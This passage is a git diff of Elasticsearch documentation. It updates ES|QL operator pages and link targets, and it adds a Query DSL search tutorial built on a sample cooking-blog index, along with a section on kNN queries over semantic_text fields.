`-` Returns the negation of the argument. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not in.md b/docs/reference/query-languages/esql/kibana/docs/operators/not in.md index 810773cf977ff..d638a876148dd 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not in.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not in.md @@ -2,4 +2,3 @@ ### NOT IN The `NOT IN` operator allows testing whether a field or expression does *not* equal any element in a list of literals, fields or expressions. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not like.md b/docs/reference/query-languages/esql/kibana/docs/operators/not like.md index 155eb473c2d93..dde8a60257346 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not like.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not like.md @@ -4,11 +4,9 @@ Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator -represents the pattern or a list of patterns. If a list of patterns is provided, -the expression will return true if any of the patterns match. +represents the pattern. The following wildcard characters are supported: * `*` matches zero or more characters. * `?` matches one character. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md b/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md index c2b04b4a9de7a..c1b2973f6ffa0 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not rlike.md @@ -5,4 +5,3 @@ Use `RLIKE` to filter data based on string patterns using using [regular expressions](https://www.elastic.co/docs/reference/query-languages/query-dsl/regexp-syntax). `RLIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator represents the pattern. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md b/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md deleted file mode 100644 index f40f821193fe5..0000000000000 --- a/docs/reference/query-languages/esql/kibana/docs/operators/predicates.md +++ /dev/null @@ -1,9 +0,0 @@ -% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. - -### PREDICATES -For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates. - -```esql -FROM employees -| WHERE birth_date IS NULL -``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/sub.md b/docs/reference/query-languages/esql/kibana/docs/operators/sub.md index 516cd3841a6a1..1fea90a58ec53 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/sub.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/sub.md @@ -2,4 +2,3 @@ ### SUBTRACT `-` Subtract one number from another. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/limitations.md b/docs/reference/query-languages/esql/limitations.md index 83ae009a7d0ca..ed5ebbbf6aa87 100644 --- a/docs/reference/query-languages/esql/limitations.md +++ b/docs/reference/query-languages/esql/limitations.md @@ -8,7 +8,7 @@ mapped_pages: ## Result set size limit [esql-max-rows] -By default, an {{esql}} query returns up to 1,000 rows. You can increase the number of rows up to 10,000 using the [`LIMIT`](/reference/query-languages/esql/commands/processing-commands.md#esql-limit) command. +By default, an {{esql}} query returns up to 1,000 rows. You can increase the number of rows up to 10,000 using the [`LIMIT`](/reference/query-languages/esql/commands/limit.md) command. :::{include} _snippets/common/result-set-size-limitation.md ::: @@ -85,7 +85,7 @@ Querying a column with an unsupported type returns an error. If a column with an Some [field types](/reference/elasticsearch/mapping-reference/field-data-types.md) are not supported in all contexts: -* Spatial types are not supported in the [SORT](/reference/query-languages/esql/commands/processing-commands.md#esql-sort) processing command. Specifying a column of one of these types as a sort parameter will result in an error: +* Spatial types are not supported in the [SORT](/reference/query-languages/esql/commands/sort.md) processing command. Specifying a column of one of these types as a sort parameter will result in an error: * `geo_point` * `geo_shape` @@ -93,7 +93,7 @@ Some [field types](/reference/elasticsearch/mapping-reference/field-data-types.m * `cartesian_shape` -In addition, when [querying multiple indexes](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md), it’s possible for the same field to be mapped to multiple types. These fields cannot be directly used in queries or returned in results, unless they’re [explicitly converted to a single type](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md#esql-multi-index-union-types). +In addition, when [querying multiple indexes](/reference/query-languages/esql/esql-multi-index.md), it’s possible for the same field to be mapped to multiple types. These fields cannot be directly used in queries or returned in results, unless they’re [explicitly converted to a single type](/reference/query-languages/esql/esql-multi-index.md#esql-multi-index-union-types). ## _source availability [esql-_source-availability] @@ -104,8 +104,8 @@ In addition, when [querying multiple indexes](docs-content://explore-analyze/que One limitation of [full-text search](/reference/query-languages/esql/functions-operators/search-functions.md) is that it is necessary to use the search function, like [`MATCH`](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match), -in a [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command directly after the -[`FROM`](/reference/query-languages/esql/commands/source-commands.md#esql-from) source command, or close enough to it. +in a [`WHERE`](/reference/query-languages/esql/commands/where.md) command directly after the +[`FROM`](/reference/query-languages/esql/commands/from.md) source command, or close enough to it. Otherwise, the query will fail with a validation error. For example, this query is valid: @@ -115,7 +115,7 @@ FROM books | WHERE MATCH(author, "Faulkner") AND MATCH(author, "Tolkien") ``` -But this query will fail due to the [STATS](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command: +But this query will fail due to the [STATS](/reference/query-languages/esql/commands/stats-by.md) command: ```esql FROM books @@ -177,10 +177,10 @@ Or consider using one of the [full-text search](/reference/query-languages/esql/ ## Using {{esql}} to query multiple indices [esql-multi-index-limitations] -As discussed in more detail in [Using {{esql}} to query multiple indices](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md), {{esql}} can execute a single query across multiple indices, data streams, or aliases. However, there are some limitations to be aware of: +As discussed in more detail in [Using {{esql}} to query multiple indices](/reference/query-languages/esql/esql-multi-index.md), {{esql}} can execute a single query across multiple indices, data streams, or aliases. However, there are some limitations to be aware of: -* All underlying indexes and shards must be active. Using admin commands or UI, it is possible to pause an index or shard, for example by disabling a frozen tier instance, but then any {{esql}} query that includes that index or shard will fail, even if the query uses [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to filter out the results from the paused index. If you see an error of type `search_phase_execution_exception`, with the message `Search rejected due to missing shards`, you likely have an index or shard in `UNASSIGNED` state. -* The same field must have the same type across all indexes. If the same field is mapped to different types it is still possible to query the indexes, but the field must be [explicitly converted to a single type](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md#esql-multi-index-union-types). +* All underlying indexes and shards must be active. Using admin commands or UI, it is possible to pause an index or shard, for example by disabling a frozen tier instance, but then any {{esql}} query that includes that index or shard will fail, even if the query uses [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter out the results from the paused index. If you see an error of type `search_phase_execution_exception`, with the message `Search rejected due to missing shards`, you likely have an index or shard in `UNASSIGNED` state. +* The same field must have the same type across all indexes. If the same field is mapped to different types it is still possible to query the indexes, but the field must be [explicitly converted to a single type](/reference/query-languages/esql/esql-multi-index.md#esql-multi-index-union-types). ## Time series data streams are not supported [esql-tsdb] @@ -244,9 +244,12 @@ Work around this limitation by converting the field to single value with one of ## Kibana limitations [esql-limitations-kibana] -* The user interface to filter data is not enabled when Discover is in {{esql}} mode. To filter data, write a query that uses the [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command instead. +* The user interface to filter data is not enabled when Discover is in {{esql}} mode. To filter data, write a query that uses the [`WHERE`](/reference/query-languages/esql/commands/where.md) command instead. * Discover shows no more than 10,000 rows. This limit only applies to the number of rows that are retrieved by the query and displayed in Discover. Queries and aggregations run on the full data set. * Discover shows no more than 50 columns. If a query returns more than 50 columns, Discover only shows the first 50. * CSV export from Discover shows no more than 10,000 rows. This limit only applies to the number of rows that are retrieved by the query and displayed in Discover. Queries and aggregations run on the full data set. -* Querying many indices at once without any filters can cause an error in kibana which looks like `[esql] > Unexpected error from Elasticsearch: The content length (536885793) is bigger than the maximum allowed string (536870888)`. The response from {{esql}} is too long. Use [`DROP`](/reference/query-languages/esql/commands/processing-commands.md#esql-drop) or [`KEEP`](/reference/query-languages/esql/commands/processing-commands.md#esql-keep) to limit the number of fields returned. +* Querying many indices at once without any filters can cause an error in kibana which looks like `[esql] > Unexpected error from Elasticsearch: The content length (536885793) is bigger than the maximum allowed string (536870888)`. The response from {{esql}} is too long. Use [`DROP`](/reference/query-languages/esql/commands/drop.md) or [`KEEP`](/reference/query-languages/esql/commands/keep.md) to limit the number of fields returned. +## Known issues [esql-known-issues] + +Refer to [Known issues](/release-notes/known-issues.md) for a list of known issues for {{esql}}. diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png new file mode 100644 index 0000000000000..a710c5e543688 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-enrich.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png new file mode 100644 index 0000000000000..26bb09ac52c33 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-limit.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png new file mode 100644 index 0000000000000..685f96d61316a Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort-limit.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png new file mode 100644 index 0000000000000..35d78acaff744 Binary files /dev/null and b/docs/reference/query-languages/images/elasticsearch-reference-esql-sort.png differ diff --git a/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg b/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg new file mode 100644 index 0000000000000..ebdb6af6785d8 --- /dev/null +++ b/docs/reference/query-languages/images/elasticsearch-reference-source-command.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md b/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md new file mode 100644 index 0000000000000..6670abd31676e --- /dev/null +++ b/docs/reference/query-languages/query-dsl/full-text-filter-tutorial.md @@ -0,0 +1,574 @@ +--- +navigation_title: Get started +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/full-text-filter-tutorial.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Get started with Query DSL search and filters [full-text-filter-tutorial] + +This is a hands-on introduction to the basics of full-text search with {{es}}, also known as *lexical search*, using the `_search` API and Query DSL. + +In this tutorial, you'll implement a search function for a cooking blog and learn how to filter data to narrow down search results based on exact criteria. +The blog contains recipes with various attributes including textual content, categorical data, and numerical ratings. +The goal is to create search queries to: + +* Find recipes based on preferred or avoided ingredients +* Explore dishes that meet specific dietary needs +* Find top-rated recipes in specific categories +* Find the latest recipes from favorite authors + +To achieve these goals, you'll use different {{es}} queries to perform full-text search, apply filters, and combine multiple search criteria. + +::::{tip} +The code examples are in [Console](docs-content://explore-analyze/query-filter/tools/console.md) syntax by default. +You can [convert into other programming languages](docs-content://explore-analyze/query-filter/tools/console.md#import-export-console-requests) in the Console UI. +:::: + +## Requirements [full-text-filter-tutorial-requirements] + +You can follow these steps in any type of {{es}} deployment. +To see all deployment options, refer to [Choosing your deployment type](docs-content://deploy-manage/deploy.md#choosing-your-deployment-type). +To get started quickly, set up a [single-node local cluster in Docker](docs-content://deploy-manage/deploy/self-managed/local-development-installation-quickstart.md). + +## Create an index [full-text-filter-tutorial-create-index] + +Create the `cooking_blog` index to get started: + +```console +PUT /cooking_blog +``` + +Next, define the mappings for the index: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "title": { + "type": "text", + "analyzer": "standard", <1> + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 <2> + } + } + }, + "description": { <3> + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "author": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "date": { + "type": "date", + "format": "yyyy-MM-dd" + }, + "category": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "tags": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "rating": { + "type": "float" + } + } +} +``` + +1. `analyzer`: Used for text analysis. If you don't specify it, the `standard` analyzer is used by default for `text` fields. It's included here for demonstration purposes. To know more about analyzers, refer [Anatomy of an analyzer](https://docs-v3-preview.elastic.dev/elastic/docs-content/tree/main/manage-data/data-store/text-analysis/anatomy-of-an-analyzer). +2. `ignore_above`: Prevents indexing values longer than 256 characters in the `keyword` field. This is the default value and it's included here for demonstration purposes. It helps to save disk space and avoid potential issues with Lucene's term byte-length limit. For more information, refer to [ignore_above parameter](/reference/elasticsearch/mapping-reference/ignore-above.md). +3. `description`: A field declared with both `text` and `keyword` [data types](/reference/elasticsearch/mapping-reference/field-data-types.md). Such fields are called [multi-fields](/reference/elasticsearch/mapping-reference/multi-fields.md). This enables both full-text search and exact matching/filtering on the same field. If you use [dynamic mapping](docs-content://manage-data/data-store/mapping/dynamic-field-mapping.md), these multi-fields will be created automatically. A few other fields in the mapping like `author`, `category`, `tags` are also declared as multi-fields. + + + +::::{tip} +Full-text search is powered by [text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md). Text analysis normalizes and standardizes text data so it can be efficiently stored in an inverted index and searched in near real-time. Analysis happens at both [index and search time](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md). This tutorial won't cover analysis in detail, but it's important to understand how text is processed to create effective search queries. + +:::: + +## Add sample blog posts to your index [full-text-filter-tutorial-index-data] + +Next, index some example blog posts using the [bulk API]({{es-apis}}operation/operation-bulk). Note that `text` fields are analyzed and multi-fields are generated at index time. + +```console +POST /cooking_blog/_bulk?refresh=wait_for +{"index":{"_id":"1"}} +{"title":"Perfect Pancakes: A Fluffy Breakfast Delight","description":"Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds. This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.","author":"Maria Rodriguez","date":"2023-05-01","category":"Breakfast","tags":["pancakes","breakfast","easy recipes"],"rating":4.8} +{"index":{"_id":"2"}} +{"title":"Spicy Thai Green Curry: A Vegetarian Adventure","description":"Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.","author":"Liam Chen","date":"2023-05-05","category":"Main Course","tags":["thai","vegetarian","curry","spicy"],"rating":4.6} +{"index":{"_id":"3"}} +{"title":"Classic Beef Stroganoff: A Creamy Comfort Food","description":"Indulge in this rich and creamy beef stroganoff. Tender strips of beef in a savory mushroom sauce, served over a bed of egg noodles. It's the ultimate comfort food for chilly evenings.","author":"Emma Watson","date":"2023-05-10","category":"Main Course","tags":["beef","pasta","comfort food"],"rating":4.7} +{"index":{"_id":"4"}} +{"title":"Vegan Chocolate Avocado Mousse","description":"Discover the magic of avocado in this rich, vegan chocolate mousse. Creamy, indulgent, and secretly healthy, it's the perfect guilt-free dessert for chocolate lovers.","author":"Alex Green","date":"2023-05-15","category":"Dessert","tags":["vegan","chocolate","avocado","healthy dessert"],"rating":4.5} +{"index":{"_id":"5"}} +{"title":"Crispy Oven-Fried Chicken","description":"Get that perfect crunch without the deep fryer! This oven-fried chicken recipe delivers crispy, juicy results every time. A healthier take on the classic comfort food.","author":"Maria Rodriguez","date":"2023-05-20","category":"Main Course","tags":["chicken","oven-fried","healthy"],"rating":4.9} +``` + +## Perform basic full-text searches [full-text-filter-tutorial-match-query] + +Full-text search involves executing text-based queries across one or more document fields. These queries calculate a relevance score for each matching document, based on how closely the document's content aligns with the search terms. {{es}} offers various query types, each with its own method for matching text and [relevance scoring](docs-content://explore-analyze/query-filter/languages/querydsl.md#relevance-scores). + +### Use `match` query [_match_query] + +The [`match`](/reference/query-languages/query-dsl/query-dsl-match-query.md) query is the standard query for full-text search. The query text will be analyzed according to the analyzer configuration specified on each field (or at query time). + +First, search the `description` field for "fluffy pancakes": + +```console +GET /cooking_blog/_search +{ + "query": { + "match": { + "description": { + "query": "fluffy pancakes" <1> + } + } + } +} +``` + +1. By default, the `match` query uses `OR` logic between the resulting tokens. This means it will match documents that contain either "fluffy" or "pancakes", or both, in the description field. + +At search time, {{es}} defaults to the analyzer defined in the field mapping. This example uses the `standard` analyzer. Using a different analyzer at search time is an [advanced use case](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md#different-analyzers). + +::::{dropdown} Example response +```console-result +{ + "took": 0, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { <1> + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 1.8378843, <2> + "hits": [ + { + "_index": "cooking_blog", + "_id": "1", + "_score": 1.8378843, <3> + "_source": { + "title": "Perfect Pancakes: A Fluffy Breakfast Delight", <4> + "description": "Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds. This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.", <5> + "author": "Maria Rodriguez", + "date": "2023-05-01", + "category": "Breakfast", + "tags": [ + "pancakes", + "breakfast", + "easy recipes" + ], + "rating": 4.8 + } + } + ] + } +} +``` + +1. `hits`: Contains the total number of matching documents and their relation to the total. +2. `max_score`: The highest relevance score among all matching documents. In this example, there is only have one matching document. +3. `_score`: The relevance score for a specific document, indicating how well it matches the query. Higher scores indicate better matches. In this example the `max_score` is the same as the `_score`, as there is only one matching document. +4. The title contains both "Fluffy" and "Pancakes", matching the search terms exactly. +5. The description includes "fluffiest" and "pancakes", further contributing to the document's relevance due to the analysis process. + +:::: + +### Include all terms match in a query [_require_all_terms_in_a_match_query] + +Specify the `and` operator to include both terms in the `description` field. +This stricter search returns *zero hits* on the sample data because no documents contain both "fluffy" and "pancakes" in the description. + +```console +GET /cooking_blog/_search +{ + "query": { + "match": { + "description": { + "query": "fluffy pancakes", + "operator": "and" + } + } + } +} +``` + +::::{dropdown} Example response +```console-result +{ + "took": 0, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 0, + "relation": "eq" + }, + "max_score": null, + "hits": [] + } +} +``` + +:::: + + + +### Specify a minimum number of terms to match [_specify_a_minimum_number_of_terms_to_match] + +Use the [`minimum_should_match`](/reference/query-languages/query-dsl/query-dsl-minimum-should-match.md) parameter to specify the minimum number of terms a document should have to be included in the search results. + +Search the title field to match at least 2 of the 3 terms: "fluffy", "pancakes", or "breakfast". This is useful for improving relevance while allowing some flexibility. + +```console +GET /cooking_blog/_search +{ + "query": { + "match": { + "title": { + "query": "fluffy pancakes breakfast", + "minimum_should_match": 2 + } + } + } +} +``` + +## Search across multiple fields [full-text-filter-tutorial-multi-match] + +When you enter a search query, you might not know whether the search terms appear in a specific field. +A [`multi_match`](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md) query enables you to search across multiple fields simultaneously. + +Start with a basic `multi_match` query: + +```console +GET /cooking_blog/_search +{ + "query": { + "multi_match": { + "query": "vegetarian curry", + "fields": ["title", "description", "tags"] + } + } +} +``` + +This query searches for "vegetarian curry" across the title, description, and tags fields. Each field is treated with equal importance. + +However, in many cases, matches in certain fields (like the title) might be more relevant than others. +You can adjust the importance of each field using field boosting: + +```console +GET /cooking_blog/_search +{ + "query": { + "multi_match": { + "query": "vegetarian curry", + "fields": ["title^3", "description^2", "tags"] <1> + } + } +} +``` + +1. The `^` syntax applies a boost to specific fields: + + * `title^3`: The title field is 3 times more important than an unboosted field. + * `description^2`: The description is 2 times more important. + * `tags`: No boost applied (equivalent to `^1`). + + These boosts help tune relevance, prioritizing matches in the title over the description and matches in the description over tags. + +Learn more about fields and per-field boosting in the [`multi_match` query](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md) reference. + +::::{dropdown} Example response +```console-result +{ + "took": 0, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 7.546015, + "hits": [ + { + "_index": "cooking_blog", + "_id": "2", + "_score": 7.546015, + "_source": { + "title": "Spicy Thai Green Curry: A Vegetarian Adventure", <1> + "description": "Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.", <2> + "author": "Liam Chen", + "date": "2023-05-05", + "category": "Main Course", + "tags": [ + "thai", + "vegetarian", + "curry", + "spicy" + ], <3> + "rating": 4.6 + } + } + ] + } +} +``` + +1. The title contains "Vegetarian" and "Curry", which matches the search terms. The title field has the highest boost (^3), contributing significantly to this document's relevance score. +2. The description contains "curry" and related terms like "vegetables", further increasing the document's relevance. +3. The tags include both "vegetarian" and "curry", providing an exact match for the search terms, albeit with no boost. + +This result demonstrates how the `multi_match` query with field boosts helps you find relevant recipes across multiple fields. +Even though the exact phrase "vegetarian curry" doesn't appear in any single field, the combination of matches across fields produces a highly relevant result. + +:::: + +::::{tip} +The `multi_match` query is often recommended over a single `match` query for most text search use cases because it provides more flexibility and better matches user expectations. +:::: + +## Filter and find exact matches [full-text-filter-tutorial-filtering] + +[Filtering](docs-content://explore-analyze/query-filter/languages/querydsl.md#filter-context) enables you to narrow down your search results based on exact criteria. Unlike full-text searches, filters are binary (yes or no) and do not affect the relevance score. Filters run faster than queries because excluded results don't need to be scored. + +The following [`bool`](/reference/query-languages/query-dsl/query-dsl-bool-query.md) query will return blog posts only in the "Breakfast" category. + +```console +GET /cooking_blog/_search +{ + "query": { + "bool": { + "filter": [ + { "term": { "category.keyword": "Breakfast" } } <1> + ] + } + } +} +``` + +1. Note the use of `category.keyword` here. This refers to the [`keyword`](/reference/elasticsearch/mapping-reference/keyword.md) multi-field of the `category` field, ensuring an exact, case-sensitive match. + + +::::{tip} +The `.keyword` suffix accesses the unanalyzed version of a field, enabling exact, case-sensitive matching. This works in two scenarios: + +1. When using dynamic mapping for text fields. {{es}} automatically creates a `.keyword` sub-field. +2. When text fields are explicitly mapped with a `.keyword` sub-field. For example, you explicitly mapped the `category` field when you defined the mappings for the `cooking_blog` index. +:::: + +### Search within a date range [full-text-filter-tutorial-range-query] + +To find content published within a specific time frame, use a [`range`](/reference/query-languages/query-dsl/query-dsl-range-query.md) query. +It finds documents that fall within numeric or date ranges. + +```console +GET /cooking_blog/_search +{ + "query": { + "range": { + "date": { + "gte": "2023-05-01", <1> + "lte": "2023-05-31" <2> + } + } + } +} +``` + +1. `gte`: Greater than or equal to May 1, 2023. +2. `lte`: Less than or equal to May 31, 2023. + +### Find exact matches [full-text-filter-tutorial-term-query] + +Sometimes you might want to search for exact terms to eliminate ambiguity in the search results. A [`term`](/reference/query-languages/query-dsl/query-dsl-term-query.md) query searches for an exact term in a field without analyzing it. Exact, case-sensitive matches on specific terms are often referred to as "keyword" searches. + +In the following example, you'll search for the author "Maria Rodriguez" in the `author.keyword` field. + +```console +GET /cooking_blog/_search +{ + "query": { + "term": { + "author.keyword": "Maria Rodriguez" <1> + } + } +} +``` + +1. The `term` query has zero flexibility. For example, if the `author.keyword` contains words `maria` or `maria rodriguez`, the query will have zero hits due to case sensitivity. + +::::{tip} +Avoid using the `term` query for `text` fields because they are transformed by the analysis process. +:::: + +## Combine multiple search criteria [full-text-filter-tutorial-complex-bool] + +You can use a [`bool`](/reference/query-languages/query-dsl/query-dsl-bool-query.md) query to combine multiple query clauses and create sophisticated searches. +For example, create a query that addresses the following requirements: + +* Must be a vegetarian recipe +* Should contain "curry" or "spicy" in the title or description +* Should be a main course +* Must not be a dessert +* Must have a rating of at least 4.5 +* Should prefer recipes published in the last month + +```console +GET /cooking_blog/_search +{ + "query": { + "bool": { + "must": [ + { "term": { "tags": "vegetarian" } }, + { + "range": { + "rating": { + "gte": 4.5 + } + } + } + ], + "should": [ + { + "term": { + "category": "Main Course" + } + }, + { + "multi_match": { + "query": "curry spicy", + "fields": [ + "title^2", + "description" + ] + } + }, + { + "range": { + "date": { + "gte": "now-1M/d" + } + } + } + ], + "must_not": [ <1> + { + "term": { + "category.keyword": "Dessert" + } + } + ] + } + } +} +``` + +1. `must_not`: Excludes documents that match the specified criteria. This is a powerful tool for filtering out unwanted results. + +::::{dropdown} Example response +```console-result +{ + "took": 1, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 7.444513, + "hits": [ + { + "_index": "cooking_blog", + "_id": "2", + "_score": 7.444513, + "_source": { + "title": "Spicy Thai Green Curry: A Vegetarian Adventure", <1> + "description": "Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.", <2> + "author": "Liam Chen", + "date": "2023-05-05", + "category": "Main Course", <3> + "tags": [ <4> + "thai", + "vegetarian", <5> + "curry", + "spicy" + ], + "rating": 4.6 <6> + } + } + ] + } +} +``` + +1. The title contains "Spicy" and "Curry", matching the should condition. With the default [best_fields](/reference/query-languages/query-dsl/query-dsl-multi-match-query.md#type-best-fields) behavior, this field contributes most to the relevance score. +2. While the description also contains matching terms, only the best matching field's score is used by default. +3. If the recipe was published within the last month, it would satisfy the recency preference. +4. The "Main Course" category satisfies another `should` condition. +5. The "vegetarian" tag satisfies a `must` condition, while "curry" and "spicy" tags align with the `should` preferences. +6. The rating of 4.6 meets the minimum rating requirement of 4.5. + +:::: + +## Learn more [full-text-filter-tutorial-learn-more] + +This tutorial introduced the basics of full-text search and filtering in {{es}}. +Building a real-world search experience requires understanding many more advanced concepts and techniques. +The following resources will help you dive deeper: + +* [Full-text search](docs-content://solutions/search/full-text.md): Learn about the core components of full-text search in {{es}}. +* [{{es}} basics — Search and analyze data](docs-content://explore-analyze/query-filter.md): Understand all your options for searching and analyzing data in {{es}}. +* [Text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md): Understand how text is processed for full-text search. +* [Search your data](docs-content://solutions/search.md): Learn about more advanced search techniques using the `_search` API, including semantic search. diff --git a/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md b/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md index d5cb9a9ea3fe2..0838dee57d69b 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-knn-query.md @@ -97,7 +97,7 @@ The filter is a pre-filter, meaning that it is applied **during** the approximat : (Optional, float) The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used. Not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied. -`rescore_vector` +`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1` : (Optional, object) Apply oversampling and rescoring to quantized vectors. ::::{note} @@ -113,7 +113,9 @@ Rescoring only makes sense for quantized vectors; when [quantization](/reference * Retrieve `num_candidates` candidates per shard. * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors. * The top `k` rescored candidates will be returned. - Must be >= 1f to indicate oversample factor, or exactly `0` to indicate that no oversampling and rescoring should occur. + Must be one of the following values: + * \>= 1f to indicate the oversample factor + * Exactly `0` to indicate that no oversampling and rescoring should occur. {applies_to}`stack: ga 9.1` See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. @@ -229,6 +231,36 @@ A sample query can look like below: Note that nested `knn` only supports `score_mode=max`. +## Knn query on a semantic_text field [knn-query-with-semantic-text] + +Elasticsearch supports knn queries over a [ +`semantic_text` field](/reference/elasticsearch/mapping-reference/semantic-text.md). + +Here is an example using the `query_vector_builder`: + +```json +{ + "query": { + "knn": { + "field": "inference_field", + "k": 10, + "num_candidates": 100, + "query_vector_builder": { + "text_embedding": { + "model_text": "test" + } + } + } + } +} +``` + +Note that for `semantic_text` fields, the `model_id` does not have to be +provided as it can be inferred from the `semantic_text` field mapping. + +Knn search using query vectors over `semantic_text` fields is also supported, +with no change to the API. + ## Knn query with aggregations [knn-query-aggregations] `knn` query calculates aggregations on top `k` documents from each shard. Thus, the final results from aggregations contain `k * number_of_shards` documents. This is different from the [top level knn section](docs-content://solutions/search/vector/knn.md) where aggregations are calculated on the global top `k` nearest documents. diff --git a/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md b/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md index c682481cdc58a..3b017804cb1f5 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-rule-query.md @@ -14,7 +14,7 @@ mapped_pages: ::::{tip} -The rule query is not supported for use alongside reranking. If you want to use query rules in conjunction with reranking, use the [rule retriever](/reference/elasticsearch/rest-apis/retrievers.md#rule-retriever) instead. +The rule query is not supported for use alongside reranking. If you want to use query rules in conjunction with reranking, use the [rule retriever](/reference/elasticsearch/rest-apis/retrievers/rule-retriever.md) instead. :::: diff --git a/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md 